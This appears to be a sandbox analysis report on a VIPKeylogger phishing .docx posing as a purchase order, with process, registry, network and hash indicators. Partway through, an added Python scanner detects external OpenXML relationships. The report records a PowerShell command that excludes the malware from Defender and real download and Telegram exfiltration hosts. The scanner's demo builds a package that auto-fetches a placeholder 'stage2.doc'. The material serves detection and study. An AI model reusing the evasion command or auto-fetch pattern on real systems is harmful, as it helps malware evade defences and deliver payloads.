Malware Analysis Report

2024-11-15 07:58

Sample ID 241023-p5vl2ashlq
Target Purchase order Coloplast AS RFQ 10059170.docx
SHA256 6e53e98fc01dd05fd91f377afadd8b75a6396958986ea211d879a4e3c713f323
Tags
vipkeylogger collection discovery execution keylogger spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6e53e98fc01dd05fd91f377afadd8b75a6396958986ea211d879a4e3c713f323

Threat Level: Known bad

The file Purchase order Coloplast AS RFQ 10059170.docx was found to be: Known bad.

Malicious Activity Summary

vipkeylogger collection discovery execution keylogger spyware stealer

VIPKeylogger

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Downloads MZ/PE file

Reads user/profile data of local email clients

Abuses OpenXML format to download file from external location

Reads user/profile data of web browsers

Executes dropped EXE

Loads dropped DLL

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

System Location Discovery: System Language Discovery

Browser Information Discovery

Office loads VBA resources, possible macro or embedded object present

Suspicious use of AdjustPrivilegeToken

outlook_office_path

Uses Volume Shadow Copy WMI provider

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

outlook_win_path

Uses Volume Shadow Copy service COM API

Launches Equation Editor

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-23 12:55

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-23 12:55

Reported

2024-10-23 12:57

Platform

win7-20240903-en

Max time kernel

128s

Max time network

130s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Purchase order Coloplast AS RFQ 10059170.docx"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Downloads MZ/PE file

Abuses OpenXML format to download file from external location

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | checkip.dyndns.org | N/A | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1492 set thread context of 2244 | N/A | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor

exploit
Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2736 wrote to memory of 1492 | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 2736 wrote to memory of 1492 | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 2736 wrote to memory of 1492 | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 2736 wrote to memory of 1492 | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 2128 wrote to memory of 1276 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe
PID 2128 wrote to memory of 1276 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe
PID 2128 wrote to memory of 1276 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe
PID 2128 wrote to memory of 1276 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe
PID 1492 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 1492 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 1492 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 1492 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 1492 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 1492 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 1492 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 1492 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 1492 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe

outlook_office_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | N/A

outlook_win_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe | N/A
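The "Abuses OpenXML format to download file from external location" and "Launches Equation Editor" signatures above describe one mechanism: a .docx is a ZIP of XML parts, and a relationship part (*.rels) whose entry carries TargetMode="External" makes Word fetch the target from the network when the file is opened, which is how the second-stage .doc cached as 1SccExdhYCwi9NS[1].doc reached EQNEDT32.EXE here. The following scanner is an added example, not code from the report or the sandbox; it lists every external relationship in a package and marks the types Word resolves without a click (OLE objects, attached templates, images; that list is an assumption for the example). The sample package it builds is constructed for the demo, and its URL is a placeholder in the documentation address range, not the address observed in the report.

```python
"""List external relationships in an OpenXML (.docx) package.

Added example for the report, not part of it. A relationship part with
TargetMode="External" is fetched by Word at open time for certain types;
those are flagged AUTO-FETCH, ordinary hyperlinks are reported as on-click.
"""
from __future__ import annotations

import io
import sys
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Relationship types Word resolves on open without user interaction
# (assumed, non-exhaustive list chosen for this example).
AUTO_FETCH_TYPES = {"oleObject", "attachedTemplate", "image"}


def scan_external_relationships(docx_bytes: bytes) -> list[dict]:
    """Return every relationship with TargetMode="External" from any *.rels part."""
    findings: list[dict] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                # The type URI ends in the short name Word uses, e.g. .../oleObject
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                findings.append({
                    "rels_part": name,
                    "id": rel.get("Id"),
                    "type": rel_type,
                    "target": rel.get("Target"),
                    "auto_fetch": rel_type in AUTO_FETCH_TYPES,
                })
    return findings


def build_sample_docx() -> bytes:
    """Constructed minimal package: one benign hyperlink, one external OLE object."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/" TargetMode="External"/>'
        # Placeholder address (RFC 5737 range), not the host seen in the report.
        '<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://203.0.113.10/stage2.doc" TargetMode="External"/>'
        '</Relationships>'
    )
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        '<w:body><w:p/></w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", document)
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


def main(argv: list[str]) -> int:
    """Scan the file given on the command line, or the constructed sample."""
    data = open(argv[1], "rb").read() if len(argv) > 1 else build_sample_docx()
    hits = scan_external_relationships(data)
    for h in hits:
        flag = "AUTO-FETCH" if h["auto_fetch"] else "on-click"
        print(f"{flag:10} {h['rels_part']} {h['id']} {h['type']} -> {h['target']}")
    return 1 if any(h["auto_fetch"] for h in hits) else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python scan_rels.py sample.docx`; a non-zero exit means at least one relationship will be fetched automatically. The scanner walks every *.rels part rather than only word/_rels/document.xml.rels because headers, footers and settings.xml carry their own relationship parts, and an attached template lives under settings.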

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Purchase order Coloplast AS RFQ 10059170.docx"

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe

"C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe"

C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe

"C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe"

Network

Country Destination Domain Proto
DE 87.120.84.38:80 87.120.84.38 tcp
DE 87.120.84.38:80 87.120.84.38 tcp
DE 87.120.84.38:80 87.120.84.38 tcp
US 8.8.8.8:53 checkip.dyndns.org udp
BR 132.226.247.73:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp

Files

memory/2128-0-0x000000002F121000-0x000000002F122000-memory.dmp

memory/2128-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2128-2-0x0000000070C5D000-0x0000000070C68000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{A0F871E2-ED0D-4456-902F-D76E3C293698}

MD5 b4b63c3d8aee40e40a2590f969eb9104
SHA1 e5c53f599aa20ff84b1c8d1c9e693d8568847722
SHA256 ba3e5df7facf028a175b0684c26190fcc602e5c70b3bf58652595ae3c005c3e7
SHA512 499d11f83f1ea3c0c14ddcd8349eff67c72355052e69198f2054189de73f619d7590910aa4de680d896bbf6ac3d7df3160decfa5226b863683bc49bf2c0d56ef

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{9F453FF1-95CF-4AC1-B432-A4C0D643512C}.FSD

MD5 d32dab83738f60a2537081c1419f8b0c
SHA1 ec99280f64e892b3cccff9f397d915fba408ec34
SHA256 234be0a2a7fd98e5709dcf41bdfe6ffa527ba54ce7136fa531dae1352bff4b59
SHA512 abca84f081f9a3166a4259f43b3b9e1f1fa32b7f0dc1471e9b4190823c7e48e603ad796aac49dcb99fb8824f72084dd51d482da1ad4f65434b188e1d121c5bc5

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

MD5 d42e113fb400b7a045f1ed527f2a1a99
SHA1 d53fcfc249bac2d315764437bdcc2b247c067b3c
SHA256 85f8a2209d21dcc151411c85131bc34bba1ec12ac38817cde8f343722b1504f8
SHA512 b1a680fbe65e83d52f25adb8bbd61e0c6b2b7b808caa4bf3fcceda2c0dd1f35034fb837bd455e5127cfc728551bd3a00195ef4f61e1c6a8edf2cbcddea685717

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\633SXO0D\1SccExdhYCwi9NS[1].doc

MD5 cb3af2d8ca17af3ac5f9522f114236a3
SHA1 b113356582cf12ea715873bcdbeddc2e0e4fe96b
SHA256 0afff6f8e9f46c3b8306e86b4fc5f6951d6cb6fc7a3d0021ac4bbb0479af3efd
SHA512 ee3bc7e1f5b85aaf7286bf90189de6d44ad6ac1a8aeee72600b83a54ecd53977d9166ce0ec90c13b61608d5d790e2fe88d05d093003076bf9413c74fb9f1f45b

\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe

MD5 a4f12b1e186febfa71ae912ee06b924b
SHA1 8d51c1f9a3b814bc30366678d6d3eb75ec8e9303
SHA256 259403bd5fd2ed0dc8744a5444dd16c3595feaa977bd507d1966e26b664ba282
SHA512 43785a06f8a09d7ea796f9c1caedff969d4343ab5be7c0d596f9f0f81b55f43f7fc16ea72321a4d36cce191c395c355187fb585eed6a2d17d3239170fbb24504

memory/1492-94-0x0000000000E60000-0x0000000000F2C000-memory.dmp

memory/1492-95-0x0000000000460000-0x000000000047E000-memory.dmp

memory/2128-97-0x0000000070C5D000-0x0000000070C68000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/1492-104-0x0000000000B80000-0x0000000000C0A000-memory.dmp

memory/2244-118-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2244-116-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2244-114-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2244-113-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2244-111-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2244-109-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2244-107-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2244-105-0x0000000000400000-0x0000000000448000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-23 12:55

Reported

2024-10-23 12:57

Platform

win10v2004-20241007-en

Max time kernel

141s

Max time network

131s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Purchase order Coloplast AS RFQ 10059170.docx" /o ""

Signatures

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeAuditPrivilege | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Purchase order Coloplast AS RFQ 10059170.docx" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
DE 87.120.84.38:80 87.120.84.38 tcp
US 8.8.8.8:53 240.76.109.52.in-addr.arpa udp
DE 87.120.84.38:80 87.120.84.38 tcp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 38.84.120.87.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 30.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.18.27.146:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 69.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 146.27.18.2.in-addr.arpa udp
US 8.8.8.8:53 133.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp

Files

memory/4496-2-0x00007FFF69270000-0x00007FFF69280000-memory.dmp

memory/4496-0-0x00007FFF69270000-0x00007FFF69280000-memory.dmp

memory/4496-3-0x00007FFFA928D000-0x00007FFFA928E000-memory.dmp

memory/4496-1-0x00007FFF69270000-0x00007FFF69280000-memory.dmp

memory/4496-6-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-5-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-4-0x00007FFF69270000-0x00007FFF69280000-memory.dmp

memory/4496-7-0x00007FFF69270000-0x00007FFF69280000-memory.dmp

memory/4496-10-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-12-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-11-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-9-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-8-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-13-0x00007FFF66910000-0x00007FFF66920000-memory.dmp

memory/4496-14-0x00007FFF66910000-0x00007FFF66920000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VKYZDMA5\1SccExdhYCwi9NS[1].doc

MD5 cb3af2d8ca17af3ac5f9522f114236a3
SHA1 b113356582cf12ea715873bcdbeddc2e0e4fe96b
SHA256 0afff6f8e9f46c3b8306e86b4fc5f6951d6cb6fc7a3d0021ac4bbb0479af3efd
SHA512 ee3bc7e1f5b85aaf7286bf90189de6d44ad6ac1a8aeee72600b83a54ecd53977d9166ce0ec90c13b61608d5d790e2fe88d05d093003076bf9413c74fb9f1f45b

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 df46d0a65fc3240d44173d3432cf97aa
SHA1 3e409dab0e8adb2a26a0b1f7cab9d86c70840406
SHA256 1449db034c4d17d63a7348fc6088ca030c7eeddae5942a460fed2e5cfdd76954
SHA512 6f11eda33f6130b39867b5f102131523c3d7bd8d5c89c18492c87f15b17793b434f08bae45f6beb8bc750632c88f55f88ee60b34f2ab0675e4a73a6bab197db5

memory/4496-65-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-64-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-63-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-62-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-61-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-60-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-66-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-72-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-73-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-71-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-70-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-69-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-68-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-67-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 298353ea13bd9f55557ac57f71e798c7
SHA1 d816ce0c4d73891897b620ec11cd3795340dbf5b
SHA256 714457b35085457cde456efb2430ed9663a2207fb93f568e56be6571deffaefd
SHA512 293eac14644a1a7fd21905514c3933458c545de4f65dd7a01633b0c926335470770eef13d21078248cec63cc4bc41bf02aa3c34315097a03a066022198799f9e

C:\Users\Admin\AppData\Local\Temp\TCD4701.tmp\gb.xsl

MD5 51d32ee5bc7ab811041f799652d26e04
SHA1 412193006aa3ef19e0a57e16acf86b830993024a
SHA256 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 d29962abc88624befc0135579ae485ec
SHA1 e40a6458296ec6a2427bcb280572d023a9862b31
